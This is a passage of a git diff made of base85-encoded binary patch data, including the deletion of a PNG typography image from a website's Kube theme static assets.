z*0$nC{q&`rsiRcd+uFjN!|{tI!y2M9E{c~^X)T6lR%n<Bk<MX_$%ilv<kQz-$5Bm^
zLQC!}(pKw&G9p}cEnZ=aTs(gGOk8#oG%<EY=YFCp{oEU-lTITPGhIZ+(ie)0)KM6Q
zlT2cCNRU_^$3e%f7>>nADm*h>IU4jRlrH^hEQMrnvPY`%5UWIBB*I<mg;=LpEE_QB
z6!D#>B}O~SCMK5JK}kh4!tTeA7m2J2{Sclw_gRs`VacNY>c%lun<N??3Z$o5i?~RL
zWaf8t;7=@LGde*febJeIU424M(=$YIS``_=jJ%7{L|T|aS=5B;U0F(ZOo9|6Z}2~M
zq!o)F)ndF;I6>!l8O3EL@v+_otTB-ri658bv}&+8p5b#uLYtnEdB{nb52ZcE%_PgX
zGNig@X)+LNJtcKaO#J2*gD<VYU@SD|EGb>gWS@=Fm{co+WSUObNsuVnyB?)SYr4Iw
zj?3kGt}Pu$qgnQdsp^=TP?vNg&Wa{Lu%x+Be>EEsSCW{y=lYayk=aJprZ^pV`oxW^
z8uOxapo%|p7Tp<|vg4W{wVhQ^9pAR@{{(j@xVr@Rg*(A5IKkcB11#J%EZi-)tc4TY
z-GaNjYv8i?+2@{@b02R%jhfZn^Q*4vuAblgjWLSWG<!ymZF;d6ccLi40t{{=;q$aY
zLZ)@$&*Pb@x4)Zam69k}qH%X9BU#+lC9@UzV`^X6L*r@22iN>K;N;Ev`ekAT!T?|Z
zmJ_3~Yw!8b<IF|x*L%6dW_PaCaBTS!4(;cBf<)QqsTLa<R~#DPV2XHzi72z=alJuF
zv}f5T1||l|FMW{%-YP9hP?6F)$JL(3hU$@PSwuwJeP}sUATwr<z%S8cu=ux)V@|MO
z(#s=VvQA>{7;VX+=&cN;VjyZHj=c7LPhTj2v~rNLf_yBBA<m^(*EhfPAj}klK$!!A
zPkh3|h8ch;aaqN$R6^!e*fpx-yxJ3Ex=`Ey$5>`qD#RqH(cHpWVo<RT!SpI!Z|Qx=
zGSe^L#8yY`?vN#o?^Ov0l_TD$XtbAJrs$Sl`UZ%J#}17<ORE@iYrBA5STc9WWPKR7
zPt#~nZ^6p!Y;^6E=;at1pcWN?C&T!z`$vtc*(2+#pD?*c4O_GUGl_vk79YO6)r0a$
zWNHr^yh@*VUkLg~3qoW?E0a<I94Q`e$&e|{ZxH0?BbViA41l4W37@7Pe)eHX)Xc5z
zsLrd#kV%QP-)m{H`XIqijw@@TZpASi=Z2xCw%(Sb8MnU+H)XZ5C^(W?XyxZbH!pX-
zQ+N2XeLumWJOucH<}q}vPfB*2I6XL`5oWW&{q)5CQ&Jjz5?p6yy()}YW4O-cvTLG_
z`fIUrDHh8>4=p+Iq)=;@2s#hw5;zZi3Bw1`#KgU;6&$ZuUC-(zj1K;M299`J2SS5H
zl`}6hvJ+VJSp0a3ns~})T8`(1<il$(%y`CT3!U3S##t_ALZp0m79?`XQ}WN4n$?-e
z4jv*t?W4`!%3pij2El;qWM8c;26QZp<)t8i1*dlfX}3un`EX&%cjs|k8*Nybkchrp
zdoxC=jJ_xQ*+C8J>=;K$zfN^z5)<8F)5qw-fZXt|$@LI;bW(uVqa&2eg|P3%sgT#@
zW_Jku#c4;w!@mM_()NajiT^(9;^efA{LbM;5591+r}2d`hcsnm*$Gcc)TcMOP^#kx
zTk$%dnhOU+9l^4TW23&wWN5ASHDd{*;q$2aq|sCqs<Fkef-ys!-pncr`kH&|%fzXq
z2Lhc4)=0DU-ew$2zuaz~>ouAKa(p^FCi5?Gz4+C+395N!%e1UW+JU!g;-uHl^n9Zf
z!~1=W%uruP;i4CZU6^z;Six?(7T<^q9V`g-GPyB4NOja#&pw@k5&4_qSKOx}s2lW3
z0a(TFbMGmIsn#2~ZC9at<WQI*X`}nLAaJ&bqIqJHQjSkFsA$$Itht}&Qo|@lmLqw)
z_>8szn_3muGl~^LPsjP!oPnr&rxLS7XtAe9(YT<i)@ju$hWIU05R@uQD-SSJTFI!^
zNl)0Nr9?Q8!UM005-|{eN|p)vNIYJdMZhxHp{@H&D>1MG!)}8*d40>H$UaiUUL(!c
z3!4uJciny(<K-RZfsD4Rc89JJU8QU~`<?*4{z=k%Y^o`bnWxsGOhnjo14MQKXt2Pl
z7!3{U^oW4er#>AHDn>CO<2tOKT^&2x<&wJ+gGV@dLiZr^Py{p*{^j2DYNz|vqoG;d
zpWygaj-t&HHXXh}X-b;I9*3Ot;Xb|u<NHgHj<gc<V77dZiGB<ZJ;@b5NhZ}H9&OdA
z21??LVYto~e^>}WQ&V7QvxN>TMhs=Lz<b$`FRVd2rJ0k>{2r+#`(>b6Oq+1eLu!cZ
znxicf=N=)<vQE%Fyo`Tl+aqq}aG+tpDGnihC6Hs;+!!(4&bXkqHeRm>$Me#jXwBsX
zJJC@odJmt+DSE|%R?R6o*WyaFPbk@V)^?>5F8=G!+IV9-=p3LN&ICVhPP~eP?JMu;
zDM;NrUG6Xz8uMY*LO^ymjb4o}+ln?ENCRWx!DL62_a`hBWMdso8OmuT3opkEdbTG~
zKyG`&D9?v;{cziRfUbQO#ELHJD(U>?ztuQsPo+l|(tOpv@tF%x5_9k>rr{efKoY+3
z9az|rW?Q040{g$$5hse3^zQT10)QQ!J?EfiS3CpleI?0r2IoPu=GvGL&W?<s`ZVvD
zAJg^xZ0y@qE<lw5V=mt51j|rbP$I;BuZJh0q3TmDRpc?yABL6LR<4IXKb0+K`!N2r
z%_L-f)E6y-Vf@UNV<1x1!AP}H$gQ&1Y$E?p*d_Bxv#CRFU!!~4lKZqX4Am$jc|Gl1
z^UV)K2ZqTrvpUo|kUzJuE8J8a_%w&zt<tr&l19aW>~Cb{<&<JzPRJeeU?<j!#mAGz
zA5!=<oMrox#UH2T-cs{w+rVu5^20P5ezJ59M5ksckI<lvpVs7IKU+dv%G!3C*(P%;
zyFS9%gE6tVHm$O62)9o>bG7;vmU%;<tJagz6>W;eU8dEW+RyfPdElt+J+kH6{iw`O
zB5}!XQXR0@PR$AN6?#B6r@tB)XPM;`Ty^*LV3NJ2(B-8zI+J!J)>JuBcSt@J3a!hJ
zIq!F8$GF(f7VDKyo`g6SxjPNYOiV~)+{%3iT-Xl&rX@5S;Y{Pi?QJ9#&Tlg5C7z8|
z-rc8q(0KTnn>t*Ju-6O2VFWfi)OOm^kypDhchnEW5kqzR#>D9R`l@q$(P$2S6<-*l
z((-BK<x%(UBdskqp0{!WhV{RFPfIMcHx4<_M!~qh!#&rB{^|zkcvId#FBjm9Zt{Ts
zHKg9KG7tnlahj>T>a;%{%hDtAvYGGZxtLV2jk==!j&7+y*mlz-4ft8_c2b0&EmiO5
zYs-YAV_4j+&iNf+ghI{S(CPh!;9w#MrUBk;)j>omE#V!N|0TPI2hY3k2%0q5zRS-}
zN-ew5<mLW+y~`7#gGlo0kWh?Q_^xlDbm1TP20Dv0cSj;45^<`^ouO}Fhp<oZb6!=d
z0ZNr3H<j7^-X7kF4VU(>o+^1tYCm+e{s8?2sA-<d4ibx_QT5Cv<rnOI3q!4YM#1E1
z{NYxOVGQ3|Z{}%RZ3h9rPDtUbYh;5~XNh}PcLkvtLp8Um{N0i}s16(L+3FOl2z!Mc
zHl(|=USPS@x~`5r<d}??+({Oxq!QM`G%0hq8BWQYox-kr_@7QLr_SYxS44r<O-o?6
zv2nq^r2V+e&zQrYVH2<-!Rq-1h-O0eq8?j`cQ{KGZB$pm<<yJoZ2w2STVoSO<hobW
zbn6N0CBk@Z?xU^t>!|+x&V+k+;~?%t6__%d_49;rlIg~{>W}JHgh4K4HC?S{*N^=K
zEacf*WkHRVJWvmgX-Nd1$94*ZQTyvyXX+Qr-Yi!u=3LzUw2T&i+Hs!yCfJI&e-?yK
znbdx-6_|=E7tVmIPz8-_<-hRq?;C*3e*%Y=@y|*c>JS|W&iZS9)J-JZR6cEG5xMZG
zmQQ<pjkCR^&T5PG)-p6`rHX4pOl)#V<b*NPNv`HE-AnhUSpc{9pNWBe^DH#zJ$q0f
z@K9qZt5~HH)?%EV_rsUznq&MsEcL<E`>P1Yf4V0X>f-Dv1vtlhvkB8%e9|qAd%zbG
z+7@79+cwILxsnhZ5GT?(_-!=X|J$l1>n_V^6-i}bM^i^t@gM`P>fl#l-5~TT5-B7%
zFr>2s@>G<AOH-`2icXvYfy)z>Ec@%oEyH~nTKLJTSkD?N*YnH@(4lNDLnnCD_{KtV
zy?Fo83i1w{QB1BvhS$dn*2pJUb2tn6cJBPhQuDY#{A~LsvxZk%WLodymm+f2G3kkE
z9FrRpOX(MxnsyS8C<f{c?_W<v>YtGC4=#Vu4Y^1oDW@H0*hv-squYng#n_goOQ9=O
zd*XgnAj+GG&)c=+cUUWGgf%&PMi>;8U4%<j=~mK^5P$35)srkQzg@(qM7-1mX_0A%
zGl-@DCKTh*0P&^sdVuIsOl8#5&L*f73h1hc6$R%qtObh<jAz1be4EX0c<Sv`^$mP)
z0<e?@c{S9-)<|qGN&*PRkosUH%L<lfxr3B-^`*~JOjy%y>6q*poyRa@<GF`As=B(e
zPVEg<scwwpOS1TG(GUA*{K)fd%I2*hZQ{GLjFISbVg}Wh+&wabfKM~QWsC_w!;!=<
zu)3)-^G@8u*WRYWJ-L|jGX+2DjEO1Zu@3CO$t>Q+X`ss0Lm*hFvrLO588k753RB^O
zzk*?ow=*`$mDz(sQ89(6@IqQ13E4Xo*IYN8MeliQ@6UojQEvQLfcE*T9L9H2TkFY)
z0FZ0M);dvgOMA}yFI09tKi^w`%jeir!DZdRfD3y)o+`TG=A*PWS)_vvc0^sbGe~Jd
zN~JExXY=2tY%kl!O-5bbNb#J$-6Y9OA_k$?B*w<WZ{W1(u*C&Kk+`w(EC$ok^$ry7
z!m(J$7;vXjug+_F=c6^?>P2ja*W=K@PhQ?medTn8EcTl4Bn<#m7|>qM+FK6lOADL#
zz^i0>#PhemZeN(u5Vy?>rH!-%b?IFJ2fn7I69zo*N=xU8kTGH|FM8f8^jqOy@8(U5
z>hb&Zeqg(0QQU2oxdx9r7d0urDq@w?OF2b>9P>T;u&zVcPT{udYKJG2f?YYfZ~DGB
zDFMfKmbul?uy{;JdDjMl89on35U>M(Id;VBQa87PTHe;d!@9hEstwK*tmnWZ(=g3z
z4g1fni|pukRBn~OX8yMx*gvYFT-%k3B-%pY7U@eSp<pA9yn+`Q-iD~rbf^2Jf5P;(
zH-C5HM?VyQob<fY3VZBVBqBBBp!;nU2}8iz`0_iR3)m&J*YJ7auos#k!BYt?{xZ3`
z7gAbAO`@!aY(=^i{|(MS8@u;?H!AKvEn4E$Gm$zR3s&x2B#&`=R<)wYVNkW+;i<rK
zu`2Qq(IEPEdqD5p$7@)>zGzyRdVUURJ=l+9)Q&#tuRh(-xVng-7d@vtDzN9~bFR_*
z<zLrXAkBnBU`zhd9^7zrG8653j)nvSFyBi#gB{%{SAAPiyZg-lBn{;A9llb9MP3W7
z3@^W3F16iPM=p2dV4(_1hf<;X@BKp=exvnUcJhVxt=H~lry$%iKbrhsqH>1V+zuyt
ztGEL;^5-cW%-_8kb)VQNCV}XLQn*vJuZ8>M*1M%*W`BgzS@E#)t)j&#CHrN|$l-pS
z=OQb(g-G1WC9yYJJOVBz<h(F-Q6i%ZBYyy)tSSxbwBcYZHI*{h$;>wHp6}6c$rM`s
zg+p2Oc<r@Y%+Sy^1$&$(JO>T^KuZY|_z#+meC-}w(>CK#{i38MmDH~6b{dlGvW50h
z@b_k;Hzya`ua3pWw{RLkW7*N95c@i()91akVcL}n3yV&aN%o!IQvzjh2=QBZ(YhED
zoFN|!5~o~CvE~R2@FyPJ!)y29*ScokB_Z_c{;qZZm%7Jhf-vqVl)NBniSO?zZ9jz`
z+(_ERC7I{YHN`a9`VbZJdOxFf5$7n680n49x-&&gCAi~nkO?>Ay-y((U^gfCMWNt8
z`*_U^ca-60eDrUfms%vHMEe0N+4i@`V|MuA(u{3(I{BlseF$kjkF3a)G%NY`q3~^Z
zS&BAN%+^w=8Z4ftvy|}^Ox4EArtU2o1tx%3Y6&rs@^8D${69pumq~fJDe<a#+<8Ap
z%juJ}cF2hTkc`ZJ<eN1GmNk8)Vl;TZl7#c{XACS$N8S<NVd)>F)z$+H8eQI6KCIi2
zPlQ4_Pkre$VV3IKN~B(`lIyuS(Gg(CWuhPkm^o7eMY6xberG~_7ffN$Y1kIV8`8tv
ziWF_G%uA-kkTq|^UI3QC5c~svTvQ}r<}RF)fBag%A@XybvM!gybBQFH<_&`mhD?=7
zzMy1tQGV~JywnpY<ga?C@w4$BjK>B1^qb%csx^iK(<i~B9RcZg?pCSv9<^+Rsz?qr
zBswg<$cns<b|pWGLV<c%m6$m?ePw+?-X&UlYfHr;^KEh;#+d3Rd}wpqn93Mqs_Fhd
zt@Il!dMF#lg|A$DG2uuAOy$q*DjNwVC(~aVep)g4FB;n$%dM%2^_2!4pO}Ap;avad
zA>R?AE`TO4fJ{elx`#TQa%OEuPdfh79b{%wacA6*Y~X+?BkkVJj6w`ZK?q&c3T;<n
zLzZl|`m+~3gxB;{ugI93GNTs<2JXPZ+-YI{h+EQ(+Lo4VfdzhFB%z*euV~{*bAZ9a
ziOl>5AR?xD>sI*h6bze~Q9$9Je3P0mTPie{qZS>n+}b!lUp-=PY@t*$@L>{S=b!!k
z@I}M;PRF%I;f$2vMkAi%=dyJN<E%k-I@qN+eQc$gv3jil$pti3i)Gogo1v)c;m#9E
zOLW*UPKm&0)Uttu&#H9NQr-P0$AsT&@t$KM(rKeNrP%5hcdW2{X8a_t5^yhbw#@<I
zFRRaf(~{y)Y~UZ)bQU;bqhG@oXGHPdQ1HBeX0QR-%D=lJ)S-TX%8;n5n)rt+%4BgJ
zkQ$Jrn5BsrUId9=&tFTDY`Z6sVnZtZb&W7H&H4&EQM|Pn*9<|sB4$+c5`MVFX0zv-
ziE4z+p(4o*)~~&@D#)~f?Z5vOR%RiNo=BkJRL=868_XXc+?uQ7rY>7?wSY}d6}zkb
z=iF7d4Itghz~wF5cafrCgkCZ`M)CHEtl2Pwh<Y1?ot3a8g46D!RFK?Kf{`HZz6P`+
z&K<ejpGMVmaD><=#K{pA1nXDD5Idia>sQ7I7<9}xAHH#?FmXP-HmgsdLpwQ9UZp=X
z%J}#}r!-Ng7~+&|NxP`{h}rr3_&Bgd)W`-&@QY=K4WT~rNJ)p*ecPm1#UQR%ak6P*
zlX3)3d<RPIFrT$u<%-hD(VQ8W)D)XLEuWXZg#+j<x^i+fTIvdoWcvJ!Sp;9GBf@!v
z-6J};c9A(JOKeqcHHi`+#(B_~KtYh~STpgaVV6{>q(ET!=#`rgqH-G+3r4aOr2rpo
zLB0*b;2cxbzdqpPd<k>NZV9V#NW1scG!WHUvvVsfgrP!w0VSBo0Uj9gPq?%8su8H4
zohdXb5mDk~=bgf|pzS3?U1_|@cV`7He_vs7XQS~45sM>Gfji|ml2u}%G}{avqYM`l
zFUWZ8|Ik%bhaWf(QxixqJ(m!!(LAVVO9>TU`X_9Ehtz*+ICU~l>&0z0rwXsN18|?i
zj|0-=wRzCkeF@<?TV4yBE#9wsR3B~!ofbNL^V_-HUgtlP-=F$HTBb@riI4;mGo{oU
z1g?Imy7W%1PnYh&j{8~t*JvORH@B2E+eo*7^4v4iI@rnpUrD@P#M|Rt9Fgg4pp4Xy
zb|gEm9&dDh(KODOjNgz)M)6jlYBBKCu1|TdIFxg;`t|Ps_d$UCgz;Oz4)y_h#TQn&
z3B0o>^_^iMCMEtBj5_Dvc@;*&U}F1J;2E4_{|+Rco*0Q{SQ~Q<-bWHdDrD9~_U@IR
z*BP*ly;r}vl_oAn;e(tjvh>+&A^W9VKJ*|%8MUGyr?bWMC4qHby5q}*I+TXzdpV|Z
z6pqTAXdx6VpWqHklZ!|5T?#2~)F<O{q8xm-vQ`xn1kE`0E91TrlQ!TMsD4c-(1tQt
zrm`>jhg*iwpLra%4waNx##*=cK(2fKhTsSZ?p$I_8O;}GnkI53I=P;a{*#41>iqUT
zY9JYtWF?tKG4OJ7Tr~Z3hlzFmVx!^Zy|baMp#!!bVJip7ri`?Ew$l|gC=x81mO+cn
zFL<vVyHi1x&=GOkF?lFuc41|&n$&J(uyzgemMDqoyw3H|Sijm=__5OL%vbx4AxkDO
z#khAPi5r@wjq@g+um1+jIk#bCVaoChFrQOYN@0y9pu=HuVN=3LVMRZ}aF2z_>u7Rc
z`Fi(4ZTukH!)Pal#BfisUljI;xQ$BTXS{<QMChQ6T}EMfacVozwL+&)(4?=Xb!cY|
zC$Bo##n!$*toiWw!l=60cspg|tpZKN-}sM89uBsuTe~uO0jADKD|>cKQPN}Psbg~y
zCjKwiXldGn6$=K4KB!GxGGU!UOn#|uuy!Z@KvLVF-JS9ua=;)N-H1B{iXL5v`g!G6
z^v`&|qX!}fvcNrW=wD%e&btR+%H<9}5y&Cncf8ca4?p{g_iJ2?i0Fa?FU}F(3vAlg
zR+py5CubGAB1>?!5Vynvr?bVaP(3=eQpQ5$IRp_w*izn+7TFlle&)MbdURb&8iDJ1
z$BIM?e&;h8>NsJ8w+Uf&@oIXDajNG4DG<pp`LaJ;q`f8Cq-TAgP3iCHn<0Zb3)XF;
z`|^(jAaQ<V>AQ*9nB5rz<B`fI*AitPvn7)<cG8(P&j}-s>vG&k&*)oE;t6Yk5r@-0
z2G>&M*1fQrw6xS*-pk-$gK@kpNLL=IlqPHBBg~)q*hZ^WsT?TZ=)aKhD#&jQN3{q=
zeoxAzlrkn5!l(b9HLwlnuFo@Y;HQt~M~7%Ib;{)VUL6e;P~TP#eV2SK^=Hg&C{p;K
zy}MVxfqDFFzRwQ}`KG3&62OT$-^!<mPS6BparL*-TT=THn>@OH3s9;rO$)m}vo_>=
z;Q_qOS(<s4g@D2bgLjr>qL+RO@pB$TGG~iet}KinF!ZDyt&E<vRqlvuyWjnBp2O=z
zdzu-l@w0DCEk#m+>%?%h_p?D2mN5^WGfH!<&`=>rtV1vFPZ#am`8111<F_2A{#kcf
zwce;eXa+5ZHyQ=&y3jnn>$2_cu50BV<3IN^77WGrZglVjT=RU~X)+1h<dzG5^v9p&
zXoYhg2-F%~ATimzwS<Wq1A&2`lHxbrdm7t<?Lx(kpVTwQKHM*z;K*;+r@aulfaS_P
ze*LL4j<~m{M}w_X?<_+>qhu;X>jui2fhD?^5p7a2GW@JVp1$o5Cn33HEmZVktn)8M
zQF6x$xJfMj1hrb-j8X$AleYGd`b&BzH-z0P8*9OwFf-VmmD{i0(OlZ0ntgpN3EfyV
z1V2ajFFsl@dF%8B1fsLtrqP24xkan~x`5)#$jom?`yP8f>LDShX2-kkPe~Ghq+JpK
zJE1@#{!c&JVR@@c3RIf&j{sGyPK`uoa#MX4Dhj`?r8`l(;X>Qtv~Eom&m;ufyA+0?
zEPTY>2wm(NDI6z$wVtTQ_%b#+hEN>Yw8kQCk=9dTzQ^*0eN`c%cYjn<rCvIJiJDm7
zOm>)`IJI<8pAp3|c_wA^f*XPcQ-Lh>J;JT8sa1D8b@8wI<m-v*=)Q}EmNnlDmx%$8
z>?`tYf0jP4rQnv!#7AQF*jkiUj0h|Iv$Ks^Vst$3J^=|QY{Fj!t5GTrF9Y?a2ojIW
zKl}kCN<}!FUoOiMCJ+({^8<YLio-S=&eFRulu-_^(9ObSzgkW<Oqe5W>=_^C^QEhy
z?nljE!tCqPcFPRHeHcW+L1q(KGO*CYyVYV(39NCFjTAc}LGx<I>3fglI}tt35wR=Y
z$jEYQ)&bV9p{{+7FGqpDGlWdW?DdW@jU@Ds10ke7+A-LvmLXC<p2bwn>lU<zczZ<s
zB5eNYVy}e1@a$ZO=&41ZM{$<SzD^G<-jeeh6ZV5tLCTWwz4Ll5lu4sKrsb~^1W7q*
zRCF6d@ut7<zt!lw``2SSSPL}iv37hP;`hu=QS_Qf2Y5hTW{L0$9Gza&w4!NGFR8hm
z!_X5iwZ*i=PK6I=&@mv5<q~CWrOr^|`{T>-xjV^&Uz$$L+u|!c9<-OuE1#1H6VQOM
zvhW;?C5ziP;3|0@!-{b0U!7)FK0UPgu~{-f-^mg0CLMk>!X*8ZQG~XNK@HR^cH45K
z29i{De=0?iAPV{?HI8C+8OcU+kP`M2KRu4DKoxy;HQVfq=4uF-SnMnC9eJ`c9^W#-
zEVVd0<>`=*=Pav<=WLUF4tsN-i;|r0?Tfk)EUeXI>TS6I`~y8&2||)pv8=XxpNgn<
znzOW?wT=!supxyIi;1A^Im|haIvv>%LvS}gp?uCGi9P}0k6J>$hD79{DSD_|8!MLT
zEkbUtpPzaCh4eSVx8lXrRi2`~w3DR!q!cbTB}&tqru}3+ujx(ZHsu-pJHp<4*4|CN
zfhmNB936C|DNncKWXo?BWS5nH8F}~Ub&jo~%Ll?r7Z4V+?D27O44#5d1E5JLf#{82
z^A+XAFU7qEezIkrOhqS$6|k~7V48pT=oGQGQ#b<N_z<M+tSeZwT8(<Ji9XN4J9L=@
z?eS?zx=lBE8l+eTUR@@-$5-0<wR9FWvROHeNBkO8U4Ga?|I;nO@j`I9XFEU!7&@42
zjm7f%Ld5+XVu~b&S0m5gv3X(h{^t+Zd-Y1mdc*10Z}Gj#Dv$K>Wyi===D`-}p#<jT
zqzJC7Qt5Uidl53Jg-IddedbMt$^ylo_a@#>X8NtZDwk8@zyJ0ASY7*$qJEp{EFyY;
zs&*C8!){ust{0i5Qs@Z^h=PqihWSJ(mF`GbRO?BqLO3(r+BE2a5~PncnZxmPd<OBr
z&RGob9XUGC_;3jv=abroVZNc2y{)gBlat%bGF)~Zb6{ru!ttYAT>oo4E(uk&-}h%<
zT~i|PeFZg7^rC^0E@z<&V&^GrC4P2Kq=MVHk{H2=Ouhy!(i$rp?rB@|f~L}XJisuR
zt&%Rn`TaTXqbx)XnatCnKtlvyHas8AB39GYWgi-xj(BN+u%lAx7etbBHeCm#S>UBO
z1CV~<Jvbu(+RXFv^0tBT{cZUI;P<Zo)Cy(H(1;1;O`X8$nCbJtu{`*BT3+o4lpxRf
z+*LzU_<4Ap;e=hDqjhPWAld9U0wX`GVLg?F#M@iO#aNf?45X$VrLZh0Bpj`VWNm4I
za<752{4=JvGILE{3P4*^{;Ti9B+IozaC0*paXas@n1KY<!sbN_Ue9rsdA^6_(tJ3Y
z^Ja`Q0H8<?T*<8N@E)P_(UiaHe0LDI!LLFm^A?&<m}<KD71s09Pe}*b=g&)4g$nn1
zbh&i+=^Xb)PH-o*a!ZKIZL`RGOX>u^mysYLg@4R=Dz6g%8?dJx1o5zOS-~2qQYhB(
zAuEnC<Z9Q-XuB_Hq3Y{{@9sv|Xiyp`!zaiJzvvRQaDtmxsYBl$q>z+J`t4S!<4v{;
zEGL#KtF1<xQ3&0ZNr$<osDx+Eiwg-!h31haZhvicMrQ?K&ni|O4OPT6?+f~7WF9Ew
zO8Ud|LhP1*oCoe@I3tsTzF8+RK=ZOpc6R)M)mrV+pM7+Jj!~dKXj@<XJ760d=u`Mq
zWSGh<!$UGEKp(yGdDh-pc7lmlM{6OMUF`kP+w4tgRJ9Ai@?Sf`)SG=Ex&hGQ;Vrs_
zNG17mQ%6S=S3pvjQ>Qr~>}09*WMQFdDw*$FjrQw)TuCJ7{!$u;JGIV2YBcj;qyqDa
zAAi%G|M>F!D55f>sF&Io9UP298Evzq;2c0(wZj>!)@t43)nPw36W+VE3{^JQZ-v1~
zY7R63HGR(eMK680**I|%okeWU=(J;c{_3#^7}{x)l5CiQn`oCtEX&8{_)k0K>dx8=
zk$Tohe9Yf0@u~_c?DRs@<@E0$#Dazby{@3uw#0Ogk|-siaE27|=H<Mw6ic$Yc#oEq
zH2tlXjdh5i4-E^2wA!Hv`+);v8l}59&&RJOO%{P)pryQwT}k{NUl>i5^Es!8yLcTH
zhz{=wXW_4wZ-o6Pc7q|38X1JyI{1`dS;F8CB(}lQL&#*JkQUVcqpjxAnRn#WGelB5
z+jnH+T8dBMs~naN1mdJvo4)tk-T#~#iy>!cpJ&B^AH{Mb;Fq`knu~l=(6smYQEPOV
zL5^^(hz<RW(?ci%v%8i=j;(g=L$M2}6L-6OW&op577!jk_lr^PD2dJSDJn9%(%a}}
zmQms}j%ZWaYtmNJ7?za#?5oLbpO=$luy9Ijnqi?VpKea87T=8nPo|JObA@Dn{ujm+
zOv`rTQjM><u14*HYO$^M{w9pPVo(+$WG&RB*hN>7NSBpO%tAY|fukPE@a!4#E-&2m
zs(UG0!}Zlydx;nsa|!+Y#XF!p{8y&+R_$4Y4uitd&sVwWe{cWXs--&w&bW5aWE8O<
zthVgoKjKqY7EpQ2NeLu|<s9hJ<fx4~IERjN3NX)CV({Kk-aLALnT_0IoF`A+q}xut
ztfWe{pFIYD9jpga_8DT9+jf&I7Bx@Kuvg!{*~g!PW(NhU8{NZmd-yXZ+nF`O2Y#Le
zszbK3A-l9^>;BIMfc7-BUFR4VV&*aLxq=;eLyJhVpo0$si9<}E^aL3obB{cm9gh&i
z1(jKl0gV(>q&~pWvYE4qb>C3zy`UY$kKSPRq-)GyZGFJ+b?gC(6O*8Ic9|f)CiX;T
zducCT;cc#g9b$l%fsq#G>0G_cY~9Nz)G`FTUMo<{y|nE;-F^6=?Q$gJ``<f;IK;*n
z>dr}poG$EBp}$1H6~+ajj`}w;Hsrz#x@0}>;|m;Mx)=|$3lz+nNiD4H9A$iC0j;z-
zc14HJNBMCUf?{0FI`%;7Ze}xk)-<IPq#cR=-_|U18PH<PFG@W0!#A5dST@WZ_7`;)
zgr>mh2`i~H{zM&4CaIQiQG3l_`ehTcAo-jJO{=FL<=iLDAUi$oIeU&bwegmB5eH7N
z=PToDqdsUzWYb*c`)d@hvQ8K++;Mvidoqoy{jRch7UxW^>xw_sbywwWIPXE*XJtTh
zRDEDFI8H}#MZlvZ^*g^qH{ShZ+)K0lwdqZ+H;SNV+<m(G^-XlKAkb2#;PVwaw9j8f
z<((B;Go4Ny6o-weiEPNM%cxMyfPZQaSHo~NFF(gDOoyKR%!BC4zGmzo9nwK+3c&VT
z=}-aq%12;@`{$|~Y%{xsQg}1icOlf;CPq)G2Crlk9W)zFbYlZ7&je!_@LBht&Ytvq
zsau_+dMK)rwN8sI8i)*7;l7OX^<CpVa6wL5l_cK5v&!Kf+f~Bl`4WKe;+Cb@k7XZ8
zoLLVHbvxH11N~jzzP;u8TBW``hCG_T6Q|=CuF-r(2O&Dksw?lsSn_kt(0Y~Cx&ZZK
zJ0JKEHE3I;g^+-U@p9Y~9|B?Bws0Zm6qpdBX%-h4bMRD*9xxr`AcL!ew9_oRUbhVD
ze9<=}*-AgCpBOXF^3||$`)Ac#(f-+I3NZRn>h<prK^^96RA)Ply$Nf{L>jxeU+8Ng
z2JlzjX)rD?`YFB#p{5lvI?VM$8RlS+dm>WpYN5xu+f9!Wh68$j^O^{v;Iy6R@3uu)
zP^dcPN!<5vN2j45zI+qRMx2EhiKg6fODyTW%!96#L;E_3+Y{rr%uMb%g1yeh940;P
za;@|B$m&)n=>#Tt3?>FC{)<vXw@Ka6_PH^8k8CFq8+-+OB~WF857{7Tia3x$VNFwi
z4uGjZIp+832Qtvcu!V=-cg88(!*9Et<7hc?QsAYP(4Ebz@$t$aaH2NFvUgI!>`q|g
zk|c)L&V4r(;FK#lTSu`Nc`*05wHtJ5iyUAkjnJ{9Y*3&sk^zEMsTxo=K-rk!N6p>C
z3<+h>4Vv#DGY&+Vi358u)?wXZ!;aDPW?_||n!8}+Y!>KEJzh6snZlIFalI;x$1yR8
z;7ggzHm=J)YRxm&LN>!bIHCT?IU4kMK6?}Duk_2-vGXJf)#rnk`WGY>j*j`kM*Uw%
z>c0Yjm*vI3v8fNH>ff}~e-l=ho7o-zMy)<B74-cVbM>!#c;5dffDdVSAiDjp!4LZC
zKNuGJ`jYRzd8~h9SpS*9k8fh#aq8y(J@Ms#^IDgeTYSD<Vw3;Hc>T}t|0bn3eCPBp
uoX~%S{cj5YM-^Gz{}-|Ozu&RH|Fd3|LptI_WBkv@At$9ISuOrO`2PSs!yy0w

diff --git a/website/src/themes/kube/static/img/kube/typography/02.png b/website/src/themes/kube/static/img/kube/typography/02.png
deleted file mode 100644
index 8077f2b8026cebb704077b0c050905b69bcafec4..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6913
zcmb6;2UwF^vPct<-UXBpigXAygx*1VM?on`sD@yO(m}eQROw1rdJ{o<M?p|jkgjw@
zKsupA-p}2=clW(-ci(&emoNFxIWu!+=1e=2Xk$ZdDhf6V0s;amT^$Wm0s=xZ;Qc8X
zA@H3FdOr;OT*YcyW6jV`SZ@aml0X%Kc0_`7Q4Y>XQ=|jJ_x=Z@0s#S$psTqx*4jWH
z21lbr9WG!*eNdhNHUWWxvX7?&+#QJpIU=21Jru#4&Fx^2D?$-$C2b&X;Hi#uan<p|
zAkF*?&EbCTa5)56SqY@z0|N-4kXQ$h59*$W7tBWy{0Cha@P08Z1_u2Bf^}B}|BWeY
z17nan8iNE$i^_<=A(9dxSvgUNw44M~N*E*|4v`TPmlA`>i9jS_z(-0P^!Eo0?1n)&
z!Av!@{=OG5QUtqTv7Rt7F>h~gQEy36G{zagm6H<_mk^VX5CI@WynH>d4n86tUfh3D
z&_H^@F|M9iSF{J{f}(>X`T<rE3~>545m26gk@fKUyP5!niTOBqia|uhFGTti(7@n7
zgQ8G>L3?3Mk^kWLUlR5*_w_`InIgT=4=`}x;GDQGw(^9jV~`G5G{zi_zW1jVja|@K
zw3iFo6Qr(wp*3kyX%N4G1Kic)Vp`x2JOcxmu7?-a!2^!e)ldWjltf)!5il(o4QWkD
zNvJwRQwsvol!0nNp-@?Ihy+AUMoLCa{ZCvCH2eVy>4E(d7x52Vxqpj$VG<}$U}p^^
z#`Pf*p@l)CK!1o1bNv^*sA*_O$ZBXwtEs8V{%c<ThKu+Yy!;(k=HKFq0nCV99PmFK
